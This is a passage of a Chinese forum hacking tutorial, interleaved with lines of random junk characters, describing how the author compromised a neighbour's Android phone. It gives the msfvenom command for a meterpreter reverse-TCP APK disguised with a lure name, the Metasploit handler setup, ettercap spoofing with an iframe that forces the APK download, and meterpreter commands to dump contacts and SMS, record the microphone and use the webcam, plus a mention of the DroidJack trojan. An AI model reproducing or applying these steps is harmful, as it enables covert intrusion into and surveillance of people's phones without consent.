|
o ^$ b& P2 P3 X# p: } 五、msf+ettercap入侵邻居安卓手机
0 y; X$ A+ l" v; V
$ V! _/ Z9 s/ I1 Y
2 h- Y, f( D1 Y# ?1 K( }6 U 首先启动msf
$ Y" m1 {2 G' B- @3 c Q: F8 `
, h: |# H! q9 T1 s+ {% C% I. {7 h0 z0 ~; h7 v8 m! f
先用kali生成一个安卓木马,如下命令:
( h+ Z# j3 v0 l9 ? 3 e5 c [; a: M. h( F( Z5 b
+ O9 w& Z+ z0 Q: [4 W( i" I5 F3 P' ` Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
" V2 \8 h. M% q4 ~ B* G# A
- T b/ x, o2 c! r7 _; D6 p9 u% ]9 [" B% X6 y& e2 f7 u
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
0 g1 L6 X' H: X : Y1 ~/ e2 X$ E9 }# Z
p$ M) z& _2 W5 Q# V1 U4 Q" G6 P 然后进入msf
# [$ h0 z; x% X2 }/ R ' j( l, |( a' B) q1 |& F6 P
1 K# x1 c5 [5 ^2 }! R( M, E. m use exploit/multi/handler ' X7 J9 n2 R4 P" G$ O! L
& V3 ~! }3 }* z2 V, P8 m7 ^& x: z
: I' i, z: W7 c6 W, ~
set payload android/meterpreter/reverse_tcp ' P2 P5 E- p2 G! w! X( }
: i9 G: @" ?2 D' y* N' n
# E9 C# P5 b* d o
set LHOST 192.168.0.109 //ip为kaili的ip
9 v, J3 @; j8 w
7 C {/ O+ _" H0 B1 J; F
2 P6 b; f- ~. d& K set LPORT 44444 //端口一定要与前面生成的木马的端口一致 : W6 l6 m, @9 H& C/ _* t7 x ?
2 v" D4 V! l% @/ N2 S) z
) w! ~9 S. S5 ~- G
Exploit ( Z5 h8 G& B5 a# [) e9 h
7 o' U3 [( X- ?) N2 W; Q) @
, ~' b/ \& D% d0 b+ U
; Z Y W0 L+ w; ?! ? 4 F+ C6 R* T+ H
* t6 J9 j5 B" l" \
下面我们开启ettercap -G 2 m. l& ]4 D) u5 l3 x
" t* ]- }7 ^' Q/ c T
( j/ B! p: W0 a1 e) D 我物理IP为
+ l0 Q. {9 _+ A0 R 6 j$ I3 O$ K' l% Z4 Z9 c" h
$ g3 X" {: z: l1 `' z9 E) R
* I% ]7 [, Z" |2 I. e9 {% w+ w . p0 D# n6 Q. {, v; _8 E3 }4 ]
8 p4 }2 O, m7 g, V7 R( H0 l) E 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, # F6 y# E& _, E7 n* O
7 t: e% j: B' Z/ v
, ?' T* p* D; B% Z4 C# x2 T3 g
下面我们来设置一下 8 K7 y6 F2 F2 E$ ~
5 G% S3 I2 a; U- ^1 W
+ n! U1 f7 A6 h; G$ y) @
6 t M) s! T, F5 ~8 J
: W! E; h/ y9 x( i8 L4 }$ ]. i- W1 {
$ C+ B' {+ k6 m/ T- T$ d+ p
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ( D# J" @9 G: x6 q
# K) ]0 f1 Y3 E/ w, a
. B B" Y" H' y+ Q
5 V# d ` m4 W9 I% x, A
* L5 v: Y A; T7 v2 C
$ }$ a' Z5 M. `: t0 a 8 |0 R. U3 p0 s2 i" g
! ?5 S6 m; {4 c: S) O! A+ W* S d: h# Z% y, ?1 U; A o0 X3 w' g3 m
$ o% i4 h( I, K2 a. J5 g* b 2 X2 X) `4 |& f% R2 z$ Z
( P7 N9 L z" }" |8 G
: W+ e% n* v5 a$ j" a# }+ W & X/ k* s" M7 ~
& T5 ?; n5 C# u6 w
2 p1 N& E" A# \: L+ M& _
8 b7 n$ D: D1 ?) L$ u
$ e0 K/ L) V* E ) {1 X6 U f# k, d. j5 X+ A& X4 x
( T/ x. N' J; l5 U' ~! B( t, t, D/ V! k1 n
8 ?( _9 Y+ p0 g: S1 [2 z7 p
6 b5 `3 V/ I2 g( ?
+ f: y( r) Z* c4 `+ c6 ]
+ A; Q1 q/ u$ |. ^9 \/ }& u
7 y! c- r: x8 Y1 o% o7 F
2 D* f$ q8 ]1 z4 h" {) E0 v7 Y
3 l: K: \# ?5 L7 N
0 O8 A8 R" }% p8 I
. K1 a5 C8 B- @- a3 ~ # q# c$ {9 Y0 F
9 z" N3 z& E: r& n) p! v
* |, B4 |+ X8 K8 e$ ?5 T& \
5 R" J1 i; A7 [" R# C5 c $ n! _4 _7 x8 f1 j1 C/ ~
: d8 k( w V0 t
% l. x* @4 Q. v. ~# L
) y+ G' a# f! C4 r6 J" z
; W |/ C5 ]9 c) c) x n. @# l% B
8 G% e" }5 p/ P0 H8 |; X( O5 o$ b
. J) G8 k" @. B
5 X) @- Z4 ~: s. g L i 下面我们开始攻击 1 M3 H4 |# C; f. H' p
3 t+ a1 Q2 R1 d( a1 A( g; [
% `) s7 B) ~ U
o0 Q5 f/ E |9 V9 }* v1 @0 h, |
. h) t' V: C$ t' W% l" M8 r4 I
7 [; i" Y) |: V ( p- J! O+ c% p* m) p- l
; J! [3 r7 `! E4 z* W4 t" k) @1 ]7 E
7 ]$ F- {# l; T# o. I / \# \" h/ Z) u4 X
5 C/ c3 Q, i9 E M2 e5 V
/ h3 f2 I; [; P/ w# d( g6 Y" o# B1 _ ; j6 c% p1 z" A+ ?
/ f1 t0 H x/ l2 u$ |7 p3 E- E
( g# D- \' f) U
7 g$ U# {' O$ q/ s
2 w0 K. U$ E0 @. j! ~4 W 大概过了5分钟多,发现反弹成功了
0 |2 X! ?+ S0 _- Y0 t0 J 5 Z d# a3 @9 z* i' D9 I. C
6 S; w; ]3 \% _0 H# V* X( w
/ a, C; [8 u. o5 Q
; R4 \% U; P' h$ z9 @5 f8 ~5 G5 I6 l. P* @2 n2 E1 D
8 e. B3 v! W9 Z0 @3 `0 U |
1 f/ u: ]& M( v$ c7 Y
6 u+ u0 X% v& w- Z
0 ~4 a: A" p: p7 j/ j3 M 6 P+ J# ~& ]1 g+ s; \( p8 H
2 ^7 q/ `% \3 H& }# R, h$ ?" V
; Q" P O! w, @7 }/ c3 v
$ j/ ]. y* O# O
: H( ~9 e. {9 i9 G& P5 T
, z, ~6 N9 Q! T3 K" ]4 F! S6 p! Z
3 v, o% T: l& l6 B7 Z# b% e! t S- o, n! e) Z8 a+ N
% z; ?2 b- m+ t0 [& z; N6 e8 I' q
" v2 @; f8 u" E- ?5 a
5 W( B- { [* K: a. a, r- Y# A7 ?: Y
, E- c1 q( t' v9 @
- a; F/ d$ t4 g6 h+ s4 o: c# e C
* ~% Q. @, A+ v( s) v. ?4 U 执行命令
. T, b" u$ Q! Q8 V! R; r
8 C3 S% H* W1 U" m s* ?
0 H9 F R) ^1 ^6 I+ H" a
1 l% y$ o* W/ k7 L2 d/ o! }, Y3 { / u$ y8 D+ q8 D( g7 d
: \1 A. P, a" m& }: _8 A5 m
dump_contacts --》这个是导出电话 6 U* H$ F) n, }: G! F
& @6 P1 I& l: f- b1 V& g: W" q! a9 O* l5 @
dump_sms --》这个是导出信息 3 t0 W. _5 @# \' P0 H0 E, J: S
% Z# e: o1 `2 X! V3 ?* |# g: n
) f' K! u( M- u record_mic Record audio from the default microphone for X seconds ) o. E" w& H6 O+ Q( ?
6 s7 U; m z$ D- u2 b) B% f4 @2 ~
1 D5 i" `: U) X) Y- G; C- M* [ webcam_chat Start a video chat
9 p3 Z! {. a+ ^3 A) R/ O! P
* E$ `% j$ k- P* A6 U# |$ k A4 Y3 S, g* E* [8 _& {1 K' P; n
webcam_list List webcams
7 i% _- z# i; [8 n m, t# O4 d - R q8 A+ S" D) [* O$ r
" M( A; Y; q0 a- i+ r" b
webcam_snap Take a snapshot from the specified webcam 4 w& `9 B% a# D9 A% o( Q3 [4 `
! O: |" ?) \9 g9 C' y
# p0 h& R/ B) S8 e$ u3 B/ i webcam_stream   lay a video stream from the specified webcam - x T% R* f8 q0 c' p+ x- n
9 R5 _# o3 r9 \! q# d
' E% `2 D* {8 ?1 l" _
/ L" {. J C( t0 b7 { % j: g" Q7 o) a; T8 c6 y
{7 U A# I+ y; V, `* c
1 [' g+ |1 W V0 G
! R% E _8 X9 a) S" |# Q* N# S6 f
: p7 d) V0 K3 |& V$ G+ u. t 我们打开看一下电话薄, : J/ H0 E/ @0 F. t5 O& U
5 T; n) @! _: R$ |" Z6 ^" i5 ~1 m7 U" Y
1 s$ A5 w9 p5 Q9 F" r( R5 n4 A; i
% z0 a1 m6 r) R- n3 p t" E( m* f9 g( _
2 P# _6 o N* B
$ }% [% c, Q% F; D& U6 Q
+ d, v/ o9 z C
; O% w: K! @7 x3 { 2 _& m4 k* B2 y# L
* g5 a; S8 J1 S% \9 `3 s! U' p5 u
2 f, T) F; h& O' _" v
6 `4 ]* I9 Y; r2 P s' F) N/ p: s. q$ p$ o/ e& `
: v' f" a! F2 l' W' o* ]. |
! ?4 e) S- d! m8 T
0 M. N, E: u$ H* G3 d * H5 p3 S: T& F
# b$ f7 a9 @4 m% T
8 V/ Q: }9 p$ f' y# t% { 我们同时欺骗成DroidJack木马,使用方法如图:
# Y" z/ l2 b+ Z/ o 1 b7 N8 b& D4 d. s
, z* c9 h: n5 i 5 R. H0 q9 r6 }8 e% ]0 l2 {( O% d
2 M1 A) C0 v' K) t6 V* n3 H: T, q- i7 Z9 ^1 A" t1 a2 o
9 g+ m) [; |2 E
# c6 A( A7 @2 r3 |
$ J/ U; \+ P/ _& \9 L6 N
* P0 k) R% z/ ?8 W! P % v4 R/ ]3 v. n$ P' z, n; C
2 J3 S/ p: L4 k6 r7 Z& G& e
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 * n0 }+ o! [. h: V
8 K) B9 c3 x2 o6 y
& K1 `' n" a: n" {8 d3 I
: L9 C3 Z; n8 L: G: H, T% h
4 H, {! {2 u- Z) I/ E; d( t. X; ^* ?- q q* n l' N5 U" @! v
; O0 y8 e; r& y
+ c. J; D! |$ K7 a f6 Q4 A/ M' p( E! e3 R, ~1 e
& R- n6 ~) Z4 Q& I1 l' g& P 5 E$ j7 Q7 y6 \# ]! V) j
, ]& |" y/ i( [6 K7 X( t5 D3 ]  ( ~- Q, p- s- p. K8 i+ _/ f
, W. V# `* g* {( U+ y, R
: v; F& T* ?/ Z& } 3 j7 x$ t3 d; O4 a P
|